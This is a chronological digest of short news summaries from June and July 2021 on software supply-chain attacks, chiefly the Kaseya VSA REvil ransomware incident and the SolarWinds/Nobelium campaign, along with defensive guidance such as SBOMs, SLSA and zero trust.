In a recent advisory, SolarWinds said a single threat actor exploited security flaws in its Serv-U Managed File Transfer and Serv-U Secure FTP products against a limited, targeted set of customers. This zero-day is new and completely unrelated to the SUNBURST supply chain attacks.
_______________________________________________________________________________________
(July 11, 2021)
JustTech and its clients impacted in Kaseya supply-chain ransomware attack
JustTech disclosed that the company and its clients were victims of the recent cyber-attack that has been reportedly attributed to a criminal gang in Russia known as REvil. For JustTech, it is believed the cyber-attack began at 12:31 PM Eastern Standard Time on Friday, July 2nd. JustTech discovered the breach, disabled, and shut down the affected servers within 8 minutes.
_______________________________________________________________________________________
(July 9, 2021)
Securing the supply chain: Lessons learned from the Codecov compromise
Rapid7 researchers provided the security community with defensive knowledge and techniques to protect against supply chain attacks involving continuous integration (CI) systems, such as Jenkins, Bamboo, etc., and version control systems, such as GitHub, GitLab, etc. It covers prevention techniques — for software suppliers and consumers — as well as detection and response techniques in the form of a playbook.
Ref - Rapid7
_______________________________________________________________________________________
(July 9, 2021)
SolarWinds Serv-U remote memory escape vulnerability
SolarWinds was recently notified by Microsoft of a security vulnerability (CVE-2021-35211) related to Serv-U Managed File Transfer Server and Serv-U Secured FTP and have developed a hotfix to resolve this vulnerability. Microsoft’s research indicates this vulnerability exploit involves a limited, targeted set of customers and a single threat actor.
_______________________________________________________________________________________
(July 8, 2021)
Kaseya left its customer portal vulnerable to a 2015 flaw in its own software
On July 3, security incident response firm Mandiant notified Kaseya that their billing and customer support site —portal.kaseya.net — was vulnerable to CVE-2015-2862, a “directory traversal” vulnerability in Kaseya VSA that allows remote users to read any files on the server using nothing more than a Web browser. As its name suggests, CVE-2015-2862 was issued in July 2015. Six years later, Kaseya’s customer portal was still exposed to the data-leaking weakness.
_______________________________________________________________________________________
(July 8, 2021)
FERC and NERC publish a whitepaper on SolarWinds and related supply chain compromise
On July 6, 2021, the staff of the FERC and the NERC E-ISAC issued a whitepaper entitled ““SolarWinds and Related Supply Chain Compromise – Lessons for the North American Electricity Industry.” The whitepaper describes these major supply chain-related cybersecurity events and the key actions to take to secure systems.
_______________________________________________________________________________________
(July 8, 2021)
NJCCIC recommendations on widespread supply chain ransomware attack
The NJCCIC recommends MSPs using VSA follow the guidance from Kaseya and disconnect VSA servers until notified by Kaseya that it is safe to connect them after an update is applied to remediate the exploited vulnerability. A tool to scan systems for signs of exploitation is available and the incident overview and technical details are also provided by Kaseya on their website.
_______________________________________________________________________________________
(July 8, 2021)
Analyzing Supply Chain Attacks
While software vulnerabilities still play a role in breaching organizations’ defenses, the software supply chain introduces an inordinate degree of new opportunities to introduce malicious artifacts and to execute unauthorized activities from within. It is important to note that malware is not a vulnerability, so it can neither be detected nor resolved using the same methods.
_______________________________________________________________________________________
(July 8, 2021)
Global ransomware supply-chain attack takes a small Maryland town offline
Leonardtown, a town in Maryland, had been a victim of the massive ransomware attack that breached a popular software made by the information technology company Kaseya. The attack reached Leonardtown through its IT management company, JustTech, which uses the affected Kaseya product.
_______________________________________________________________________________________
(July 7, 2021)
REvil Ransomware Attack on Kaseya VSA - Detailed technical analysis
Unlike previous attacks by REvil where the dwell time was very long and data was carefully exfiltrated prior to detonating ransomware, this attack appears to have happened very quickly. It appears that the threat actors knew they were racing against the development of a patch. Security researcher Victor Gevers and the team at DIVD.nl disclosed the vulnerability to Kaseya and had been working with them on a patch, but REvil beat them to the punch.
_______________________________________________________________________________________
(July 7, 2021)
Analyzing the REvil Ransomware attack
In the recent attack on Kaseya, the ransomware was delivered via a malicious update payload sent out to the Kaseya VSA server platform. The REvil gang used a Kaseya VSA zero-day vulnerability (CVE-2021-30116) in the Kaseya VSA server platform. Security researchers have identified three zero-day vulnerabilities potentially used in attacks against their clients, including Authentication Bypass Vulnerability, Arbitrary File Upload Vulnerability, and Code Injection Vulnerability.
_______________________________________________________________________________________
(July 7, 2021)
The massive Kaseya ransomware attack - Key things to know and learn
The attack on Kaseya points to a popular target for ransomware attackers: Managed Service Providers. MSPs such as Kaseya's customers allow companies to outsource certain software and services, such as IT management, to third parties, which can help avoid the cost of having to employ such experts in-house.
_______________________________________________________________________________________
(July 7, 2021)
In the Kaseya supply chain ransomware attack, history repeats itself
Though details of the recent international ransomware campaign (via Kaseya) are still emerging, the attack patterns are reminiscent of the mega Cloud Hopper attack, a years-long cyber invasion that was first uncovered in 2016 and targeted the world’s largest technology service providers and their customers.
_______________________________________________________________________________________
(July 7, 2021)
Deconstructing the REvil Ransomware attack on Kaseya VSA
After gaining access to VSA, the attackers created a fake malicious automated update called “Kaseya VSA Agent Hot-fix,” then pushed it to VSA servers in Kaseya’s clients’ networks. Kaseya VSA administrative access was disabled to the compromised servers and the notorious REvil (aka Sodinokibi) ransomware was delivered to other machines in their networks.
_______________________________________________________________________________________
(July 7, 2021)
Kaseya VSA ransomware attack, SolarWinds hack share many similarities
Last weekend’s Kaseya VSA supply chain ransomware attack and last year’s giant SolarWinds hack share a number of similarities. The attacks on Kaseya and SolarWinds share the most “sinister point” of compromise. That’s the trust between a vendor and a client. Key among the differences, however, is that the exploit of the Kaseya VSA product led to the injection of ransomware into the endpoints managed by Kaseya VSA on-premises users, while the SolarWinds attack led to data exfiltration.
_______________________________________________________________________________________
(July 7, 2021)
REvil ransomware gang’s major supply chain attack may affect over 1,500 customers
Although it was initially believed that only 50 companies using VSA on-premises were targeted by REvil, the evolving situation reveals more potential victims as numbers climb to the tune of 1,500-2,000 companies likely exposed to downstream impact by this major attack. The number of potential victims can be so much larger because Kaseya’s customers themselves are MSPs who serve a customer base of their own.
Ref - Security Intelligence
_______________________________________________________________________________________
(July 6, 2021)
The key lessons from Kaseya cyber attack
The solution to the Kaseya attack is more than detection and protection. It requires policy, regulations, law enforcement, diplomacy, criminal ecosystem disruption, and reducing the benefit of the crime.
_______________________________________________________________________________________
(July 6, 2021)
SolarWinds hackers breached RNC via Synnex in a new attack
The Russian government hackers behind the SolarWinds campaign breached the computer systems of the Republican National Committee through Synnex in a new attack. There is no indication, however, that the RNC itself was hacked or that any RNC information was stolen.
_______________________________________________________________________________________
(July 6, 2021)
Kaseya ransomware: a software supply chain attack or not?
The newly discovered vulnerability, initially known only to the attackers, allowed them to exploit the on-premise version of the Kaseya software, and ultimately conduct the ransomware attack. And, because so many of Kaseya's customers are MSPs, the attackers were able to pass the ransomware attack downstream to as many as 1,500 small and medium-size businesses that outsource everyday IT functions.
_______________________________________________________________________________________
(July 6, 2021)
Kaseya says it's seen no sign of a supply chain attack
Kaseya has said it’s been unable to find signs its code was maliciously modified and offered its users a ray of hope with the news that it is testing a patch for its on-prem software and is considering restoring its SaaS services on Tuesday.
Ref - The Register
_______________________________________________________________________________________
(July 6, 2021)
How can a business ensure the security of its supply chain?
The reality is that supply chain attacks are not going away. In the first quarter of 2021, 137 organizations reported experiencing supply chain attacks at 27 different third-party vendors, while the number of supply chain attacks rose 42% from the previous quarter. Therefore, it becomes important for businesses to mitigate risk when it comes to the increased threat from supply chain attacks.
_______________________________________________________________________________________
(July 6, 2021)
SolarWinds hackers still targeting Microsoft, focus on support staff
Microsoft's Threat Intelligence Center's investigation detected information-stealing malware on a machine belonging to one of Microsoft's customer support agents with access to basic account information for a small number of our customers. The actor used this information in some cases to launch highly targeted attacks as part of their broader campaign.
_______________________________________________________________________________________
(July 6, 2021)
Kaseya supply chain ransomware attack - Technical analysis
The threat actor behind this attack identified and exploited a zero-day vulnerability in the Kaseya VSA server. The compromised Kaseya VSA server was used to send a malicious script to all clients that were managed by that VSA server. The script was used to deliver REvil ransomware that encrypts files on the affected systems.
Ref - ZScaler
_______________________________________________________________________________________
(July 6, 2021)
Ransomware group connected to JBS incident thought to be behind massive MSP supply chain attack
While most Americans were preparing for the July 4 holiday weekend by picking up burgers and beers, the hackers thought to be responsible for the JBS ransomware incident were readying a supply chain attack timed to hit when IT workers were off duty. An attack on managed service providers (MSPs) making use of Kaseya products is thought to have compromised at least 200 of that company’s clients, and possibly as many as tens of thousands in total.
_______________________________________________________________________________________
(July 5, 2021)
New supply chain ransomware attack targets
The sophisticated supply-chain ransomware attack targeting Kaseya initially leveraged a vulnerability in the Kaseya VSA software to gain access to victim organizations and then used REvil’s RaaS to infect those organizations with ransomware. Reports claim that a malicious update was deployed to the Kaseya VSA interface by the threat actors as an update or hotfix for the Kaseya VSA agent.
_______________________________________________________________________________________
(July 5, 2021)
Kaseya crippled by supply chain attack
REvil compromised Kaseya VSA servers and is currently using them to deploy and distribute their ransomware. The ransomware encryptors are contained in the file agent.exe. When this file is activated, both an old yet legitimate copy of Windows Defender MsMpEng.exe, and the encryptor payload mpsvc.dll. are dropped into the C:\Windows path to DLL sideload - a process where a malicious DLL file is loaded in place of a legitimate one.
_______________________________________________________________________________________
(July 5, 2021)
Real-time prevention of the Kaseya VSA supply chain REvil ransomware attack
In the Kaseya attack, most of the attacked endpoints were Windows servers. This attack is particularly evasive because all the attack chain components are signed with digital certificates, starting from the Kaseya process, continuing with a vulnerable Microsoft Defender process, and ending with the side-loaded signed ransomware.
_______________________________________________________________________________________
(July 5, 2021)
Over 1000 organizations globally attacked on Fourth of July weekend, biggest supply chain attack since Sunburst
To breach on-premise Kaseya VSA servers, REvil used a zero-day vulnerability that was in the process of being fixed. The vulnerability had been previously disclosed to Kaseya by security researchers from the Dutch Institute for Vulnerability Disclosure, and Kaseya was validating the patch before rolling it out to customers. However, the REvil ransomware gang was one step ahead of Kaseya and used the vulnerability to carry out their attack.
_______________________________________________________________________________________
(July 5, 2021)
US spy agencies investigate Kaseya supply chain attack
President Biden has ordered his intelligence agencies to investigate a major ransomware supply chain attack over the weekend that targeted a vendor of IT software used by managed service providers (MSPs). Suspected to be the work of a REvil affiliate, the attack on Miami-headquartered Kaseya was spotted by its incident response team at around midday on Friday.
_______________________________________________________________________________________
(July 5, 2021)
Hackers’s sophisticated ransomware attack targeted a flaw in IT management
The hackers behind a mass ransomware attack exploited multiple previously unknown vulnerabilities in IT management software made by Kaseya Ltd., the latest sign of the skill and aggressiveness of the Russia-linked group believed responsible for the incidents.
_______________________________________________________________________________________
(July 5, 2021)
IT for Kaseya defers decision about SaaS restoration after supply chain attack
IT management software provider Kaseya has deferred an announcement about the restoration of its SaaS services, after falling victim to a supply chain attack that has seen its products become a delivery mechanism for the REvil ransomware. On learning of the attack, Kaseya urged customers to pull the plug on their VSA servers, because the attack shuts off administrator access to the suite. The company also shuttered its SaaS services as a precautionary measure.
_______________________________________________________________________________________
(July 4, 2021)
Guidance for MSPs and their customers affected by the Kaseya VSA supply-chain
CISA and FBI recommend MSP customers affected by the Kaseya VSA supply-chain attack take immediate action to implement cybersecurity best practices. They are recommended to download and use the Kaseya VSA Detection Tool. Agencies also recommend enabling and enforcing multi-factor authentication (MFA) on every single account that is under the control of the organization.
_______________________________________________________________________________________
(July 4, 2021)
Kaseya supply chain attack targeting MSPs to deliver REvil ransomware
The threat actor, an affiliate of the REvil ransomware-as-a-service, identified and exploited a zero-day vulnerability in the VSA server. The vulnerability was exploited to introduce a malicious script to be sent to all computers managed by the server, therefore reaching all the end clients. The script delivered the REvil ransomware and encrypted the systems.
Ref - TrueSec
_______________________________________________________________________________________
(July 4, 2021)
How Russian spies hacked the Justice, State, Treasury, Energy and Commerce Departments
The Department of Homeland Security spent billions on a program called "Einstein" to detect cyber attacks on government agencies. The Russians outsmarted it. They circumvented the NSA, which gathers intelligence overseas, but is prohibited from surveilling U.S. computer networks. So the Russians launched their attacks from servers set up anonymously in the United States.
_______________________________________________________________________________________
(July 4, 2021)
Independence Day: REvil uses supply chain exploits to attack hundreds of businesses
REvil’s operators posted to their “Happy Blog”, claiming that more than a million individual devices were infected by the malicious update. They also said that they would be willing to provide a universal decryptor for victims of the attack, but under the condition that they need to be paid $70,000,000 worth of BitCoin.
_______________________________________________________________________________________
(July 4, 2021)
How U.S. cyber policy changed after SolarWinds
Since the disclosure of SolarWinds attacks and since the formation of the new government in the United States, several things have changed in the cybersecurity world. The Biden Administration imposed sanctions on Russia, ordered new cybersecurity standards for federal contracts with software companies, and chose the nation's first National Cyber Director.
_______________________________________________________________________________________
(July 3, 2021)
Kaseya ransomware supply chain attack: Key things to know
Several hundred organizations have been targeted by the REvil (aka Sodinokibi) ransomware in a supply chain attack involving Kaseya VSA software and multiple Managed Service Providers (MSPs) who use it. REvil attacks are usually financially motivated. However, there are some signs that the attacks may be politically motivated disruption.
Ref - Symantec
_______________________________________________________________________________________
(July 3, 2021)
Kaseya supply-chain attack hits nearly 40 service providers
Threat actors behind the notorious REvil cybercrime operation appear to have pushed ransomware via an update for Kaseya's IT management software, hitting around 40 customers worldwide, in what's an instance of a widespread supply-chain ransomware attack. Following the incident, the IT and security management services company said it took immediate steps to shut down its SaaS servers as a precautionary measure, in addition to notifying its on-premises customers to shut down their VSA servers to prevent them from being compromised.
_______________________________________________________________________________________
(July 3, 2021)
Kaseya supply?chain attack: What we know so far
Kaseya IT management software, commonly used in Managed Service Provider (MSP) environments, had been hit by another in a series of supply-chain hacks. As with the SolarWinds incident, this latest attack uses a two-step malware delivery process sliding through the back door of tech environments. The cybercriminals behind this attack apparently had monetary gain rather than cyber espionage in their sights, eventually planting ransomware while exploiting the trust relationship between Kaseya and its customers.
_______________________________________________________________________________________
(July 2, 2021)
REvil ransomware gang executes supply chain attack via malicious Kaseya update
The REvil ransomware gang appears to have gained access to the infrastructure of Kaseya, a provider of remote management solutions and is using a malicious update for the VSA software to deploy ransomware on enterprise networks.
Ref - The Record
_______________________________________________________________________________________
(July 2, 2021)
REvil ransomware hits 1,000+ companies in MSP supply-chain attack
Researchers are tracking 20 MSPs where Kaseya VSA was used to encrypt over 1,000 businesses and are working in close collaboration with six of them. They have proof that their customers are being encrypted as well. Kaseya issued a security advisory on their help desk site, warning all VSA customers to immediately shut down their VSA server to prevent the attack's spread while investigating.
Ref - Bleeping Computer
_______________________________________________________________________________________
(July 2, 2021)
Kaseya VSA Supply-Chain Ransomware Attack
CISA is taking action to understand and address the recent supply-chain ransomware attack against Kaseya VSA and the multiple managed service providers (MSPs) that employ VSA software. CISA encourages organizations to review the Kaseya advisory and immediately follow their guidance to shut down VSA servers.
_______________________________________________________________________________________
(July 2, 2021)
Improve supply chain security with intelligence from surface, deep & dark web
In the past several months, the SolarWinds attack and the subsequent fallout have forced organizations to reexamine their supply chain security approach. Mitigating the supply chain threats involves a blended approach that includes secure development processes, vulnerability scanning and management, and endpoint security alongside effective vendor governance practices.
_______________________________________________________________________________________
(July 1, 2021)
Kaseya VSA supply-chain ransomware attack -Sophos report
Sophos said that the supply chain attack that uses Kaseya to deploy a variant of the REvil ransomware into a victim’s environment is geographically dispersed. It appears that the attackers used a zero-day vulnerability to remotely access internet-facing VSA Servers.
Ref - Sophos
_______________________________________________________________________________________
(June 30, 2021)
11 Tactics to prevent supply chain attacks
To prevent supply chain attacks, organizations can follow these strategies. They are required to implement Honeytokens, secure Privileged Access Management, and implement a Zero Trust Architecture. They should prepare for security by assuming that they will be attacked for sure.
_______________________________________________________________________________________
(June 29, 2021)
Improving the security of your supply chain through integration
To counter the threat of a supply chain incursion, companies are well served by the latest generation of highly specialized threat intelligence solutions. Take a breach and attack simulation (BAS) tool like Cymulate for example. BAS solutions can help reduce supply chain risk by conducting ongoing, automated penetration testing. They identify vulnerabilities by mimicking the tactics used by bad actors and showing you where you’re most exposed.
_______________________________________________________________________________________
(June 29, 2021)
Zero-Trust doesn’t mean zero breaches
The detailed and specific answer to any particular breach depends on the actual mechanism incorporated for the initial infection and/or propagation. In the case of SolarWinds, the initial infection threat vector is unknown. Its dissemination technique, on the other hand, is as public as it is horrifying: the previously trusted software supply chain.
_______________________________________________________________________________________
(June 29, 2021)
Denmark's central bank exposed in SolarWinds hack
Denmark's central bank was compromised in last year's global SolarWinds hacking operation, leaving a "backdoor" to its network open for seven months. A backdoor stood open at the Danish central bank for seven months until it was discovered by U.S. security firm Fire Eye, Version2 said, citing various documents it obtained under a freedom of information request, such as SolarWinds emails.
_______________________________________________________________________________________
(June 28, 2021)
SolarWinds attack cost affected companies an average of $12 million
A recent ‘2021 Cybersecurity Impact Report’ from IronNet has revealed some interesting facts about Solarwinds attacks. The report is based on interviews with 473 security IT decision-makers from the U.S., U.K., and Singapore who work in the technology, financial, public service, and utility sectors. The survey found that 90% of respondents said their security posture had improved over the last two years, but 86% suffered attacks severe enough to require a meeting of the companies' C-level executives or boards of directors.
_______________________________________________________________________________________
(June 28, 2021)
Some UW institutions used software compromised by Russian hackers - US Officials
Email records show University of Wisconsin System cybersecurity staff raced to determine whether any of its 26 campuses or central office had been impacted by the global SolarWinds hacking incident discovered in December 2020. According to documents, some UW institutions were running the compromised software, though it's unclear whether attackers stole information or disrupted university networks.
_______________________________________________________________________________________
(June 28, 2021)
SolarWinds hackers continue the assault with a new Microsoft breach
The Nation-state hackers who orchestrated the SolarWinds supply chain attack compromised a Microsoft worker’s computer and used the access to launch targeted attacks against company customers. The hacking group also compromised three entities using password-spraying and brute-force techniques, which gain unauthorized access to accounts by bombarding login servers with large numbers of login guesses.
_______________________________________________________________________________________
(June 28, 2021)
Microsoft says new breach discovered in probe of suspected SolarWinds hackers
Microsoft said that an attacker had gained access to one of its customer-service agents and then used information from that to launch hacking attempts against customers. The company said it had found the compromise during its response to hacks by a team it identifies as responsible for earlier major breaches at SolarWinds and Microsoft.
Ref - Reuters
_______________________________________________________________________________________
(June 28, 2021)
SolarWinds attack cost affected companies in key sectors 11% of total annual revenue
IronNet Cybersecurity released its 2021 Cybersecurity Impact Report assessing timely topics such as the estimated cost per enterprise of the SolarWinds cyber attack, executive-level engagement in attack responses, and the effect of information sharing on an organization’s overall security posture. Among the 85 percent of respondents affected by SolarWinds, nearly one-third said their organization felt a significant financial impact from the attack. In fact, the attack cost affected companies, on average, 11 percent of their annual revenue.
Ref - Streetinsider
_______________________________________________________________________________________
(June 27, 2021)
IT companies bear brunt of new SolarWinds hacker attacks
IT companies have made up the majority of organizations targeted amid new activity by the group behind last year’s SolarWinds supply-chain attack, with at least one victim coming from Microsoft’s customer support ranks. The attack mostly targeted IT companies, which comprised 57% of total targets, followed by government (20%), and smaller percentages for non-governmental organizations and think tanks, as well as financial services.
Ref - ARNNet
_______________________________________________________________________________________
(June 26, 2021)
Microsoft says SolarWinds hackers attacked three in a new breach
Microsoft Corp. said the hackers behind the SolarWinds cyberattack recently compromised a new trio of victims using access to one of the company’s customer support agents. The hacked portal used by the individual agent contained information for a small number of customers, which the attackers used to launch a highly targeted attack.
_______________________________________________________________________________________
(June 26, 2021)
Microsoft admits to signing rootkit malware in supply-chain fiasco
Microsoft has confirmed signing a malicious driver being distributed within gaming environments. This driver, called "Netfilter," is in fact a rootkit that was observed communicating with Chinese command-and-control (C2) IPs. The driver in question was seen communicating with China-based C&C IPs providing no legitimate functionality and as such raised suspicions.
_______________________________________________________________________________________
(June 25, 2021)
The majority of large businesses caught up in supply chain attacks last year
The majority of large enterprises (64 percent) suffered a software supply chain attack last year, according to a report from security company Anchore. The report states that the use of software containers is on the rise thanks to the widespread use of DevOps processes to speed up development. This report highlights that 60 percent of respondents have made securing the software supply chain a top initiative for 2022.
_______________________________________________________________________________________
(June 25, 2021)
New Nobelium activity disclosed by Microsoft
The Microsoft Threat Intelligence Center is tracking new activity from the NOBELIUM threat actor, which includes password spray and brute-force attacks. The activity was largely focused on US interests, about 45%, followed by 10% in the UK, and smaller numbers from Germany and Canada. In all, 36 countries were targeted.
_______________________________________________________________________________________
(June 24, 2021)
Atlassian bugs could have led to a 1-click takeover
A supply-chain attack could have siphoned sensitive information out of Jira, such as security issues on Atlassian cloud, Bitbucket, and on-prem products. By exploiting the bug, with just one click, an attacker could have siphoned sensitive information out of Jira. The flaws could have also enabled an attacker to take over accounts and to control some of Atlassian’s applications, including Jira and Confluence.
_______________________________________________________________________________________
(June 24, 2021)
The power of anonymity in supply chain security
A large number of MSPs are managing Microsoft 365 for clients. So it’s critical that they protect Microsoft 365 with an email security solution that is integrated with Microsoft 365 via API, sitting inside Microsoft’s architecture. This architectural structure has a number of advantages, including making the solution invisible to hackers in an MX record query and allowing for internal email scanning, which can thwart lateral phishing and ransomware attacks within Microsoft 365.
_______________________________________________________________________________________
(June 24, 2021)
Shifting left with analytics to identify software supply chain anomalies
The supply chain can be compromised in part due to a lack of security monitoring and oversight for the coding and delivery of software (continuous integration/continuous delivery (CI/CD) pipelines), which creates a dangerous security gap. This gap widens because security testing does not test for changes in the software systems.
Ref - Security Intelligence
_______________________________________________________________________________________
(June 24, 2021)
A supply-chain breach: Taking over an Atlassian account
On November 16, 2020, Check Point Research (CPR) uncovered chained vulnerabilities that together can be used to take over an account and control some of Atlassian apps connected through SSO. Further details about this have been recently released by Check Point. According to them, once the attacker leverages these vulnerabilities and takes over an account, he can plant backdoors that he can use in the future for his supply-chain attacks.
Ref - CheckPoint
_______________________________________________________________________________________
(June 23, 2021)
SUNBURST: Attack Flow, C2 Protocol, and Prevention
The SUNBURST backdoor is not yet fully understood. Spanning almost 3500 lines of code, “obfuscated” with casual naming, trying to evade shallow review, it has many subtleties yet to uncover. The Cynet research team attempted to gain a better understanding of the command-and-control communication channel, its various stages, and conditions required for execution. The main goal of this investigation is to find infected beaconing machines.
_______________________________________________________________________________________
(June 22, 2021)
Hackers are trying to attack big companies, and small suppliers are the weakest link
Researchers at cybersecurity company BlueVoyant examined hundreds of SMB defense company subcontractor firms.. It was found that over half had severe vulnerabilities within their networks, including unsecured ports and unsupported or unpatched software, making them vulnerable to cyberattacks including data breaches and ransomware.
_______________________________________________________________________________________
(June 22, 2021)
An unpatched flaw in Linux Pling Store apps could lead to supply-chain attacks
Cybersecurity researchers have disclosed a critical unpatched vulnerability affecting Pling-based free and open-source software (FOSS) marketplaces for Linux platform that could be potentially abused to stage supply-chain attacks and achieve remote code execution (RCE).
_______________________________________________________________________________________
(June 22, 2021)
Three lessons CISOs can learn from the SolarWinds cyberattack
Here are some lessons that CISOs learn from the SolarWinds incident to change the way they secure and manage their supply-chain infrastructure. Continuous visibility into interconnected networks, Inventory management with optimal cyber hygiene, implementation of a Zero trust model, and role-based access to privileged accounts can help minimize the risks.
_______________________________________________________________________________________
(June 22, 2021)
Government-mandated SBOMs to throw light on software supply chain security
An SBOM is effectively an ingredient list or a nested inventory, a formal record containing the details and supply chain relationships of various components used in building software. The EO requires NTIA to produce three proposed minimum elements that should go into any SBOM: data fields, operational considerations, and support for automation.
_______________________________________________________________________________________
(June 22, 2021)
U.S. SEC probing SolarWinds clients over cyber breach disclosures
The U.S. Securities and Exchange Commission (SEC) has opened a probe into last year's SolarWinds cyber breach, focusing on whether some companies failed to disclose that they had been affected by the unprecedented hack. The SEC sent investigative letters late last week to a number of public issuers and investment firms seeking voluntary information on whether they had been victims of the hack and failed to disclose it.
_______________________________________________________________________________________
(June 21, 2021)
CISA doesn't know how many US federal agencies use firewalls
The Department of Homeland Security’s top cybersecurity agency doesn’t know how many agencies are segmenting their networks from unwanted outside traffic. The agency provided the answers in response to a February inquiry from Wyden’s office following a heated Senate Intelligence Committee hearing about the breach at the federal contractor SolarWinds.
Ref - CyberScoop
_______________________________________________________________________________________
(June 21, 2021)
Attacks against container infrastructures increasing, including supply chain attacks
Hiding an attack during a CI build can succeed in most organizations’ CI environments. This attack targets supply-chain processes and could be modified to target other hidden supply chain components, processes, or even the build artifacts themselves, which can pose a severe threat.
Ref - Security Week
_______________________________________________________________________________________
(June 21, 2021)
Lessons from the JBS attack for securing the manufacturing supply chain
There are several lessons from the JBS attack that will help manufacturing leaders secure their infrastructure. Organizations need to control access to ecosystem applications and automate identity governance. In addition, they need to strengthen authentication using Continuous Adaptive Risk and Trust (CARTA) and Zero Trust security and secure non-human identities.
_______________________________________________________________________________________
(June 21, 2021)
Software-container supply chain sees spike in attacks
Typosquatting and credential stuffing are two of the most common ways that attackers are attempting to target companies' container infrastructure and the Docker-image supply chain, with attacks climbing nearly 600% in the second half of 2020 compared with the same period a year ago.
_______________________________________________________________________________________
(June 21, 2021)
SolarWinds hack could have been deterred by simple security measures
The SolarWinds hack, one of the largest cybersecurity incidents in U.S. history, may have been deterred or minimized if basic security measures had been put in place. CISA agrees that a firewall blocking all outgoing connections to the internet would have neutralized the malware.
Ref - The Hill
_______________________________________________________________________________________
(June 18, 2021)
Google dishes out homemade SLSA to thwart software supply-chain attacks
Google has proposed a framework called SLSA for dealing with supply chain attacks, a security risk exemplified by the recent compromise of the SolarWinds Orion IT monitoring platform. SLSA – short for Supply chain Levels for Software Artifacts and pronounced "salsa" for those inclined to add convenience vowels – aspires to provide security guidance and programmatic assurance to help defend the software build and deployment process.
_______________________________________________________________________________________
(June 18, 2021)
How PAM can protect feds from third-party/ service account cyber attacks
PAM solutions manage and control privileged accounts by isolating, monitoring, recording, and auditing these account sessions, commands, and actions. Third parties and service accounts cannot do their jobs a majority of the time without elevated privileges for access – thus making them a de facto part of the agency enterprise.
Ref - Meritalk
_______________________________________________________________________________________
(June 17, 2021)
Firmware security requires firm supply chain agreements
According to Bloomberg, China’s theft of technology is the biggest threat to corporate America and the US military. And the Russians are experts at infiltrating the supply chain of trusted code as witnessed by the recent SolarWinds breach, along with 20-years’ worth of cyber espionage and attacks. Organizations need to actively embed security controls before they take possession of a product.
_______________________________________________________________________________________
(June 17, 2021)
Lessons learned from the SolarWinds cyberattack and the future of NY-DFS
The New York DFS alerted DFS-regulated entities of the SolarWinds Attack on December 18, 2020, through the "Supply Chain Compromise Alert." In general, DFS found that its regulated entities responded swiftly and appropriately with 94% of impacted companies removing the vulnerable systems caused by the SolarWinds hackers from their networks (and or patching them) within three days of being notified of the attack. However, DFS noted gaps in cybersecurity policies of several regulated entities, including irregularities in patching and patch management systems, etc.
_______________________________________________________________________________________
(June 17, 2021)
UNC2465 cybercrime group launched a supply chain attack on CCTV vendor
An affiliate of the Darkside ransomware gang, tracked as UNC2465, has conducted a supply chain attack against a CCTV vendor Dahua’s SmartPSS Windows app. UNC2465 is considered one of the main affiliates of the DARKSIDE group, along with other affiliated gangs tracked by FireEye/Mandiant as UNC2628 and UNC2659.
_______________________________________________________________________________________
(June 17, 2021)
The SolarWinds attack and its lessons
The increase in sophisticated and complex cyber-attacks like SolarWinds requires a change in the traditional security paradigm by increasing the priority of cyber-security and policies. Two types of policies have been introduced, including the prevention and problem-solving policies.
_______________________________________________________________________________________
(June 16, 2021)
Everything you need to know about SolarWinds hack
The purpose of the hack remains largely unknown. Still, there are many reasons hackers would want to get into an organization's system, including having access to future product plans or employee and customer information held for ransom. It is also not yet clear what information, if any, hackers stole from government agencies. But the level of access appears to be deep and broad.
_______________________________________________________________________________________
(June 16, 2021)
Smoking out a Darkside affiliate’s supply chain software compromise
Mandiant observed DARKSIDE affiliate UNC2465 accessing at least one victim through a Trojanized software installer downloaded from a legitimate website. While this victim organization detected the intrusion, engaged Mandiant for incident response, and avoided ransomware, others may be at risk. UNC2465’s move from drive-by attacks on website visitors or phishing emails to this software supply chain attack shows a concerning shift that presents new challenges for detection.
Ref - FireEye
_______________________________________________________________________________________
(June 16, 2021)
New ThroughTek IoT supply chain vulnerability announced
DHS and Nozomi Networks Labs announced a new vulnerability discovered in a ThroughTek software component that’s used broadly by many security cameras and smart device vendors. The ThroughTek component is part of the supply chain for many original equipment manufacturers (OEMs) of consumer-grade security cameras and IoT devices. ThroughTek states that its technology is used by several million Internet of Things (IoT)-connected devices.
_______________________________________________________________________________________
(June 16, 2021)
Darkside operator involved in supply chain attack via CCTV vendor’s website
A cybercrime group that used to cooperate with the Darkside ransomware gang has breached the website of a CCTV camera vendor and inserted malware (SMOKEDHAM backdoor) in a Windows application the company’s customers were using to configure and control their security feeds. The malware was hidden inside a customized version of the Dahua SmartPSS Windows app that the unnamed CCTV vendor was providing to its customers.
_______________________________________________________________________________________
(June 16, 2021)
Supply chain attacks and vulnerability disclosures
SolarWinds, giant aviation digital services provider SITA, and DevOps tool provider Codecov are among this year’s victims of supply chain attacks that continue to create a ripple effect of data breaches across their customers, exposing millions of records. The latest attack on supply chains is on Edward Don and Company, a known distributor of foodservice equipment and supplies in the U.S.
_______________________________________________________________________________________
(June 16, 2021)
SolarWinds’ transparency trying to ensure others are safer
Sudhakar Ramakrishna, President, and CEO at Solarwinds revealed his thoughts about the importance of continuous learning from everything, be it a bug or a cyber incident. These learnings will fortify what can be done going forward to make it that much more difficult for a threat actor to perform their attacks.
_______________________________________________________________________________________
(June 14, 2021)
How to ensure third parties don't compromise the organizational supply chain
Organizations can probably count many third-party vendors in their IT environment vital in storing, securing, and analyzing their data. Most times, however, companies only assess the security of these third-party products when they’re onboarded. There’s no continuous security analysis or assessment. They should demand a monthly security risk assessment report from all third-party vendors to glean details on all known issues in their product and infrastructure.
_______________________________________________________________________________________
(June 14, 2021)
Codecov to retire the Bash script responsible for supply chain attack wave
Codecov has introduced a new uploader that relies on NodeJS to replace and remove a Bash script responsible for a recent supply chain attack. The new uploader will be shipped as a static binary executable suitable for Windows, Linux, Alpine Linux, and macOS. Codecov's Bash uploader was the source of a string of supply chain attacks taking place around January 31, 2021, made public on April 15.
_______________________________________________________________________________________
(June 13, 2021)
SolarWinds hack emboldened cyberattackers for ransomware attack spree
When a cyberattack successfully occurs on the scale of SolarWinds, history suggests hackers are emboldened to come back for more money, valuable data, and fame. The SolarWinds hackers' tactics and techniques worked so remarkably well last year that there was an incentive for them and others like them to keep going.
_______________________________________________________________________________________
(June 11, 2021)
Monumental supply-chain attack on Airlines traced to APT41
A monster cyberattack on SITA, a global IT provider for 90 percent of the world’s airline industry, is slowly unfolding to reveal the largest supply-chain attack on the airline industry in history. After Air India revealed the details of its security breach, it became clear that the carriers were most likely dealing with one of the biggest supply-chain attacks in the airline industry’s history, potentially traced back to the Chinese state-sponsored threat actor APT41.
